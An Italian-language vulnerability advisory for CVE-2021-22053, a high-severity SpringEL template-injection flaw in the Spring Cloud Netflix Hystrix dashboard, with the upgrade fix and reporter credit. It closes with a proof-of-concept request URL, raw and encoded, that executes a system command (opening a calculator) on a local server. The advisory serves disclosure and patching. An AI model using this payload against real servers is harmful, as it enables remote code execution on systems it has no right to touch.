
Vulnerabilità di risoluzione del template della dashboard Hystrix di Spring Cloud Netflix CVE-2021-22053
Alta
Spring by VMware
Le applicazioni che utilizzano sia spring-cloud-netflix-hystrix-dashboard che spring-boot-starter-thymeleaf espongono un modo per eseguire codice inviato all'interno del path dell'URI della richiesta durante la risoluzione dei template delle viste. Quando viene effettuata una richiesta a /hystrix/monitor;[dati forniti dall'utente], gli elementi del path successivi a hystrix/monitor vengono valutati come espressioni SpringEL, che possono portare all'esecuzione di codice.
La gravità è alta se non diversamente specificato.
Gli utenti delle versioni interessate dovrebbero applicare la seguente mitigazione: gli utenti dovrebbero effettuare l'aggiornamento alla 2.2.10.RELEASE+. Non sono necessari altri passaggi. Le versioni che hanno risolto questo problema includono:
Questa vulnerabilità è stata identificata e segnalata in modo responsabile da threedr3am del SecCoder Security Lab ([email protected]).
2021-11-17: Pubblicato il rapporto iniziale della vulnerabilità.
raw:
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/
encode:
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/
PS. La barra diagonale '/' non può essere portata nel comando.